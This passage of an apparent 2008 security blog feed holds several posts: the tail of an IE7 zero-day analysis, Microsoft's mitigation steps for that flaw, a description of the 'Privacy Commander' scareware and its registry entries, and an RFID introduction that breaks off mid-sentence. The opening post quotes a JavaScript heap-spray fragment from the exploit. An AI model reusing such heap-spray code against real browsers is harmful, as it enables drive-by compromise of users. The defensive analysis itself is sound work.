style="margin-bottom: 0.0001pt; line-height: normal;"&gt;}&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var heapBS=0x400000;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var sizeHDM=0x5;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var PLSize=(sCode.length*2);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var sSlideSize=heapBS-(PLSize+sizeHDM);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var heapBlocks=(heapSA+heapBS)/heapBS;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;var memory=new Array();&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;sSlide=getsSlide(sSlide,sSlideSize);&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;for(i=0;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;i&amp;amp;lt;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;heapBlocks;&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;i++)&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;{&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span&gt;    &lt;/span&gt;memory[i]=sSlide+sCode&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;}&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;----------------------------------------------------------------------------------------------------------------------&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;A similar POC code is already demonstrated here&lt;/p&gt;  &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;a href="http://www.bugsearch.net/it/5806/NCTsoft%20AudFile.dll%20ActiveX%20Control%20Remote%20Buffer%20Overflow%20Exploit.html" target="_blank"&gt;http://www.bugsearch.net/it/5806/NCTsoft%20AudFile.dll%20ActiveX%20Control%20Remote%20Buffer%20Overflow%20Exploit.html&lt;/a&gt;&lt;/p&gt;      &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;a href="http://www.milw0rm.com/exploits/6175" target="_blank"&gt;http://www.milw0rm.com/exploits/6175&lt;/a&gt;&lt;/p&gt;    &lt;p style="margin-bottom: 0.0001pt; line-height: normal;"&gt;There were few more locations delivering more exploits too, so the theme of the stroy is immediately block the URLs and domains you can see in this post.&lt;/p&gt;  &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-804517309334066652?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/804517309334066652/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=804517309334066652' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/804517309334066652'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/804517309334066652'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/ie-7-zero-day-exploit-delivering-domain.html' title='IE 7 Zero day Exploit delivering Domain Demystified'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8950434595251246566</id><published>2008-12-17T14:29:00.001-08:00</published><updated>2008-12-17T14:29:04.650-08:00</updated><title type='text'>Microsoft released security advisory for Internet Explorer 7 zero-day</title><content type='html'>&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CDEEPAY%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;style&gt; &amp;lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	mso-bidi-font-size:11.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1960330369; 	mso-list-type:hybrid; 	mso-list-template-ids:529703254 -1236995858 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&amp;gt; &lt;/style&gt;  &lt;p class="MsoNormal"&gt;Finally after a Long wait the Advisory is released by Microsoft, for the IE7 Zero day exploit.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;But there are some work around too which needs to be done.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;The Internet security zone settings can be changed to prompt for before running any ActiveX Controls and Active Scripting while browsing. This can be done by raising the browsing security level in Internet Explorer to High. This sets the security level for all Web sites you visit to High. Which means no ActiveX will be executed without a prompt. You can set the internet explorer to prompt for the ActiveX execution by doing the following setting.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;ol style="margin-top: 0in;" start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;In      Internet Explorer, click Internet Options on the Tools menu.&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Click      the Security tab.&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Click      Internet, and then click Custom Level.&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Under      Settings, in the Scripting section, under Active Scripting, click Prompt      or Disable, and then click OK.&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Click      Local intranet, and then click Custom Level.&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Under      Settings, in the Scripting section, under Active Scripting, click Prompt      or Disable, and then click OK.&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Click      OK two times to return to Internet Explorer.&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;You can also Restrict Internet Explorer from using OLEDB32.dll, only to Windows Vista. Create a file named &lt;b style=""&gt;&amp;quot;BlockAccess_x86.inf&amp;quot;&lt;/b&gt; For 32-bit systems and &lt;b style=""&gt;&amp;quot;BlockAccess_x64.inf&amp;quot;&lt;/b&gt; for a 64-Bit System and then paste the following text and then save it to a temporary directory:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Code For 32-bit systems&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;[Unicode]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Unicode=yes&lt;/p&gt;  &lt;p class="MsoNormal"&gt;[Version]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;signature=&amp;quot;$CHICAGO$&amp;quot;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Revision=1&lt;/p&gt;  &lt;p class="MsoNormal"&gt;[File Security]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;quot;%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll&amp;quot;,2,&amp;quot;S:(ML;;NWNRNX;;;ME)&amp;quot;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Code For 64-bit systems&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;[Unicode]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Unicode=yes&lt;/p&gt;  &lt;p class="MsoNormal"&gt;[Version]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;signature=&amp;quot;$CHICAGO$&amp;quot;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Revision=1&lt;/p&gt;  &lt;p class="MsoNormal"&gt;[File Security]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;quot;%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll&amp;quot;,2,&amp;quot;S:(ML;;NWNRNX;;;ME)&amp;quot;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;quot;%ProgramFiles(x86)%\Common Files\System\Ole DB\oledb32.dll&amp;quot;,2,&amp;quot;S:(ML;;NWNRNX;;;ME)&amp;quot;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Once done saving the files run the following command from the temporary directory with Administrator previlages&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;SecEdit /configure /db BlockAccess.sdb /cfg &amp;lt;inf file&amp;gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;you should see the following messages if Successfully done.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;The task has completed successfully.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;See log %windir%\security\logs\scesrv.log for detail info.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;For some more detail please visit the vendor website at the following location&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx"&gt;http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx&lt;/a&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;br&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;Reference&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;a href="http://www.microsoft.com/technet/security/advisory/961051.mspx"&gt;http://www.microsoft.com/technet/security/advisory/961051.mspx&lt;/a&gt;&lt;br&gt; &lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;a href="http://www.newsoxy.com/internet-explorer/article11469.html"&gt;http://www.newsoxy.com/internet-explorer/article11469.html&lt;/a&gt;&lt;br&gt;&lt;/p&gt;   &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8950434595251246566?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8950434595251246566/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8950434595251246566' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8950434595251246566'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8950434595251246566'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/microsoft-released-security-advisory.html' title='Microsoft released security advisory for Internet Explorer 7 zero-day'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8851683548364409494</id><published>2008-12-17T14:00:00.001-08:00</published><updated>2008-12-17T14:00:04.070-08:00</updated><title type='text'>test</title><content type='html'>Test Post&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8851683548364409494?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8851683548364409494/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8851683548364409494' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8851683548364409494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8851683548364409494'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/test.html' title='test'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8057564936995191847</id><published>2008-12-08T21:57:00.001-08:00</published><updated>2008-12-08T21:57:32.759-08:00</updated><title type='text'>New Rouge Software, PrivacyCommander</title><content type='html'>&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CDEEPAY%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;style&gt; &amp;lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	mso-bidi-font-size:11.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&amp;gt; &lt;/style&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;strong&gt;&lt;span style="font-weight: normal;"&gt;I was looking for something new to post, just came through reading about a rouge software, named as "&lt;/span&gt;Privacy Commander" &lt;/strong&gt;&lt;strong&gt;&lt;span style="font-weight: normal;"&gt;which gives scary messages about your computer being infected with viruses and Trojans but&lt;/span&gt;&lt;/strong&gt; When installed, Privacy Commander configures itself to start automatically when you start Windows. Once its loaded and running it scans the system and tells you about probable serious infections, but the truth is there is none, it actually scans the temp folder and it falsely rates the files as infected and then asks you to purchase the software to remove them, So kindly do not purchase, it's a rouge software.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;It creates the following registry entries&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;HKEY_CURRENT_USER\Software\sysguard&lt;br&gt; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\sysguard&lt;br&gt; HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run &amp;quot;tipguard.exe&amp;quot;&lt;br&gt; HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon &amp;quot;Shell&amp;quot;=&amp;gt; C:\Program Files\Privacy Commander\sysguard.exe&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;It has this following files too.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;c:\Documents and Settings\Bleeping\Desktop\Privacy Commander.lnk&lt;br&gt; c:\Documents and Settings\Bleeping\Start Menu\Programs\Privacy Commander&lt;br&gt; c:\Documents and Settings\Bleeping\Start Menu\Programs\Privacy Commander\Privacy Commander.lnk&lt;br&gt; c:\Documents and Settings\Bleeping\Start Menu\Programs\Privacy Commander\Uninstall.lnk&lt;br&gt; c:\Program Files\Privacy Commander&lt;br&gt; c:\Program Files\Privacy Commander\settings.ini&lt;br&gt; c:\Program Files\Privacy Commander\sysguard.exe&lt;br&gt; c:\Program Files\Privacy Commander\tipguard.exe&lt;br&gt; c:\Program Files\Privacy Commander\uninstall.exe&lt;br&gt; c:\Program Files\Privacy Commander\img&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_fixed_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_fixed_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_fixed_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_fixed_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_licence_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_licence_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_licence_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_licence_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_main_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_main_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_main_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_main_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_warning_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_warning_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_warning_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bg_warning_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_activate_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_activate_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_activate_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_activate_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_cancel_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_cancel_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_cancel_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_cancel_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_fix_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_fix_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_fix_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_fix_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_ok_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_ok_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_ok_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_ok_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_silent_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_silent_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_silent_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_silent_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_upd_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_upd_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_upd_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_upd_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_update_de.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_update_en.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_update_es.jpg&lt;br&gt; c:\Program Files\Privacy Commander\img\bt_update_it.jpg&lt;br&gt; c:\Program Files\Privacy Commander\lang&lt;br&gt; c:\Program Files\Privacy Commander\lang\de.lng&lt;br&gt; c:\Program Files\Privacy Commander\lang\en.lng&lt;br&gt; c:\Program Files\Privacy Commander\lang\es.lng&lt;br&gt; c:\Program Files\Privacy Commander\lang\it.lng&lt;br&gt; c:\Program Files\Privacy Commander\sounds&lt;br&gt; c:\Program Files\Privacy Commander\sounds\1.mp3&lt;br&gt; c:\Program Files\Privacy Commander\sounds\2.mp3&lt;br&gt; c:\Program Files\Privacy Commander\sounds\3.mp3&lt;/p&gt;    &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b style=""&gt;&lt;u&gt;Removal and Reference&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;Kindly visit&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-120414-0500-99&amp;amp;tabid=3"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-120414-0500-99&amp;amp;tabid=3&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8057564936995191847?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8057564936995191847/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8057564936995191847' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8057564936995191847'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8057564936995191847'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/new-rouge-software-privacycommander.html' title='New Rouge Software, PrivacyCommander'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-1277856944976850524</id><published>2008-12-08T03:42:00.001-08:00</published><updated>2008-12-08T03:42:06.172-08:00</updated><title type='text'>Radio Frequency Identification (RFID)</title><content type='html'>&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;style&gt; &amp;lt;!--  /* Font Definitions */  @font-face 	{font-family:&amp;quot;Cambria Math&amp;quot;; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;} @font-face 	{font-family:Tahoma; 	panose-1:2 11 6 4 3 5 4 4 2 4; 	mso-font-alt:Tahoma; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:&amp;quot;&amp;quot;; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} a:link, span.MsoHyperlink 	{mso-style-priority:99; 	font-family:&amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	color:blue; 	mso-themecolor:hyperlink; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} p.Default, li.Default, div.Default 	{mso-style-name:Default; 	mso-style-unhide:no; 	mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	mso-layout-grid-align:none; 	text-autospace:none; 	font-size:12.0pt; 	font-family:&amp;quot;Tahoma&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-theme-font:minor-fareast; 	color:black;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&amp;gt; &lt;/style&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;/span&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;So Guys what are RFID, well, in simple terms it is a radio transmission which contains some type of indentification from the transmitting device and for the reciever to understand who it is. Like it can be a call sign of a radio unit the people use for normal communication, or a aircraft calling its control tower with the call sign of the aircraft. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;RFID is related to all those devices and technology who use radio signals for exchanging and identifying data. Usually RFID is a small &lt;span style=""&gt;tag&lt;/span&gt; or &lt;span style=""&gt;label by which a object is identified&lt;/span&gt;. The communication happens by exchanging radio signal and then interpreting it by extracting the identification information. For example&lt;span style=""&gt;&amp;nbsp; &lt;/span&gt;the reader asks "who or what are you?" the tag answers that, let's say, "I am object ABC-12345". This process can be even more complex, like the information can pass through various levels of encryption and then relayed to a remote server and verified with a backend database for authenticity. &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;There are various uses of RFID, like tracking trucks on highway, tracking bags in airport transfers, in superstores and warehouses, and many more, but the ones I found innovative while searching through the internet was in the bellow link. 